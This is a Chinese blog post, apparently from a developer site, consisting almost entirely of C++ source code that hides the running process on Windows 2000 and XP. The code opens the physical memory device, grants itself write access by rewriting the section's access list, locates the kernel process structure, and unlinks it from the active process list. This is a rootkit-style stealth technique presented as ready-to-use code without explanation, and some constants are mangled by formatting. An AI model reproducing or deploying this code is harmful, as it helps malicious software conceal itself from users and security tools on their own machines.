2000和xp下隐藏进程

// HideProcess.h
BOOL HideProcess();

 

 

// HideProcess.cpp
#include < windows.h >
#include
< Accctrl.h >
#include
< Aclapi.h >

#include
" HideProcess.h "

#define  NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define  STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define  STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

typedef LONG NTSTATUS;

typedef 
struct  _IO_STATUS_BLOCK 
{
    NTSTATUS Status;
    ULONG Information;
}
 IO_STATUS_BLOCK,  * PIO_STATUS_BLOCK;

typedef 
struct  _UNICODE_STRING 
{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
}
 UNICODE_STRING,  * PUNICODE_STRING;

#define  OBJ_INHERIT                0x00000002L
#define  OBJ_PERMANENT            0x00000010L
#define  OBJ_EXCLUSIVE            0x00000020L
#define  OBJ_CASE_INSENSITIVE    0x00000040L
#define  OBJ_OPENIF                0x00000080L
#define  OBJ_OPENLINK            0x00000100L
#define  OBJ_KERNEL_HANDLE        0x00000200L
#define  OBJ_VALID_ATTRIBUTES    0x000003F2L

typedef 
struct  _OBJECT_ATTRIBUTES 
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
}
 OBJECT_ATTRIBUTES,  * POBJECT_ATTRIBUTES; 

typedef NTSTATUS (CALLBACK
*  ZWOPENSECTION)(
    OUT PHANDLE SectionHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes
    );

typedef VOID (CALLBACK
*  RTLINITUNICODESTRING)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );

RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL 
=  NULL;
PVOID g_pMapPhysicalMemory 
=  NULL;
HANDLE g_hMPM 
=  NULL;
OSVERSIONINFO g_osvi;
// ---------------------------------------------------------------------------
BOOL InitNTDLL()
{
    g_hNtDLL 
= LoadLibrary("ntdll.dll");

    
if (NULL == g_hNtDLL)
        
return FALSE;

    RtlInitUnicodeString 
= (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, 

"RtlInitUnicodeString");
    ZwOpenSection 
= (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

    
return TRUE;
}

// ---------------------------------------------------------------------------
VOID CloseNTDLL()
{
    
if(NULL != g_hNtDLL)
        FreeLibrary(g_hNtDLL);

    g_hNtDLL 
= NULL;
}

// ---------------------------------------------------------------------------
VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) 

    PACL pDacl                    
= NULL; 
    PSECURITY_DESCRIPTOR pSD    
= NULL; 
    PACL pNewDacl 
= NULL; 
    
    DWORD dwRes 
= GetSecurityInfo(hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, 

NULL, 
&pDacl, NULL, &pSD);

    
if(ERROR_SUCCESS != dwRes)
    
{

    
if(pSD) 
        LocalFree(pSD); 
    
if(pNewDacl) 
        LocalFree(pNewDacl); 
    }


    EXPLICIT_ACCESS ea; 
    RtlZeroMemory(
&ea, sizeof(EXPLICIT_ACCESS)); 
    ea.grfAccessPermissions 
= SECTION_MAP_WRITE; 
    ea.grfAccessMode 
= GRANT_ACCESS; 
    ea.grfInheritance
= NO_INHERITANCE; 
    ea.Trustee.TrusteeForm 
= TRUSTEE_IS_NAME; 
    ea.Trustee.TrusteeType 
= TRUSTEE_IS_USER; 
    ea.Trustee.ptstrName 
= "CURRENT_USER"

    dwRes 
= SetEntriesInAcl(1,&ea,pDacl,&pNewDacl);
    
    
if(ERROR_SUCCESS != dwRes)
    
{

    
if(pSD) 
        LocalFree(pSD); 
    
if(pNewDacl) 
        LocalFree(pNewDacl); 
    }

    dwRes 
= SetSecurityInfo

(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL);
    
    
if(ERROR_SUCCESS != dwRes)
    
{

    
if(pSD) 
        LocalFree(pSD); 
    
if(pNewDacl) 
        LocalFree(pNewDacl); 
    }


}
 
// ---------------------------------------------------------------------------
HANDLE OpenPhysicalMemory()
{
    NTSTATUS status;
    UNICODE_STRING physmemString;
    OBJECT_ATTRIBUTES attributes;
    ULONG PhyDirectory;

    g_osvi.dwOSVersionInfoSize 
= sizeof(OSVERSIONINFO);
    GetVersionEx (
&g_osvi);

    
if (5 != g_osvi.dwMajorVersion)
        
return NULL;

    
switch(g_osvi.dwMinorVersion)
    
{
        
case 0:
            PhyDirectory 
= 0x30000;
            
break//2k
        case 1:
            PhyDirectory 
= 0x39000;
            
break//xp
        default:
            
return NULL;
    }


    RtlInitUnicodeString(
&physmemString, L"/Device/PhysicalMemory");

    attributes.Length                    
= sizeof(OBJECT_ATTRIBUTES);
    attributes.RootDirectory            
= NULL;
    attributes.ObjectName                
= &physmemString;
    attributes.Attributes                
= 0;
    attributes.SecurityDescriptor        
= NULL;
    attributes.SecurityQualityOfService    
= NULL;

    status 
= ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); 

    
if(status == STATUS_ACCESS_DENIED)
    

        status 
= ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes); 
        SetPhyscialMemorySectionCanBeWrited(g_hMPM); 
        CloseHandle(g_hMPM);
        status 
= ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); 
    }


    
if(!NT_SUCCESS(status)) 
        
return NULL;

    g_pMapPhysicalMemory 
= MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory, 

0x1000);

    
if( g_pMapPhysicalMemory == NULL )
        
return NULL;

    
return g_hMPM;
}

// ---------------------------------------------------------------------------
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
    ULONG VAddr 
= (ULONG)addr,PGDE,PTE,PAddr;
    PGDE 
= BaseAddress[VAddr>>22];

    
if (0 == (PGDE&1))
        
return 0;

    ULONG tmp 
= PGDE & 0x00000080;

    
if (0 != tmp)
    
{
        PAddr 
= (PGDE & 0xFFC00000+ (VAddr & 0x003FFFFF);
    }

    
else
    
{
        PGDE 
= (ULONG)MapViewOfFile(g_hMPM, 40, PGDE & 0xfffff0000x1000);
        PTE 
= ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];
        
        
if (0 == (PTE&1))
            
return 0;

        PAddr
=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
        UnmapViewOfFile((PVOID)PGDE);
    }


    
return (PVOID)PAddr;
}

// ---------------------------------------------------------------------------
ULONG GetData(PVOID addr)
{
    ULONG phys 
= (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    PULONG tmp 
= (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 

0xfffff0000x1000);
    
    
if (0 == tmp)
        
return 0;

    ULONG ret 
= tmp[(phys & 0xFFF)>>2];
    UnmapViewOfFile(tmp);

    
return ret;
}

// ---------------------------------------------------------------------------
BOOL SetData(PVOID addr,ULONG data)
{
    ULONG phys 
= (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
    PULONG tmp 
= (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff0000x1000);

    
if (0 == tmp)
        
return FALSE;

    tmp[(phys 
& 0xFFF)>>2= data;
    UnmapViewOfFile(tmp);

    
return TRUE;
}

// ---------------------------------------------------------------------------
long  __stdcall exeception( struct  _EXCEPTION_POINTERS  * tmp)
{
   ExitProcess(
0);
   
return 1 ;
}

// ---------------------------------------------------------------------------
BOOL YHideProcess()
{
//    SetUnhandledExceptionFilter(exeception);

    
if (FALSE == InitNTDLL())
        
return FALSE;

    
if (0 == OpenPhysicalMemory())
        
return FALSE;

    ULONG thread  
= GetData((PVOID)0xFFDFF124); //kteb
    ULONG process = GetData(PVOID(thread + 0x44)); //kpeb

    ULONG fw, bw;
    
if (0 == g_osvi.dwMinorVersion)
    
{
        fw 
= GetData(PVOID(process + 0xa0));
        bw 
= GetData(PVOID(process + 0xa4));        
    }


    
if (1 == g_osvi.dwMinorVersion)
    
{
        fw 
= GetData(PVOID(process + 0x88));
        bw 
= GetData(PVOID(process + 0x8c));
    }

        
    SetData(PVOID(fw 
+ 4), bw);
    SetData(PVOID(bw), fw);

    CloseHandle(g_hMPM);
    CloseNTDLL();

    
return TRUE;
}


BOOL HideProcess()
{
 
static BOOL b_hide = false;
 
if (!b_hide)
 
{
  b_hide 
= true;
  YHideProcess();
  
return true;
 }

 
return true;
}
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值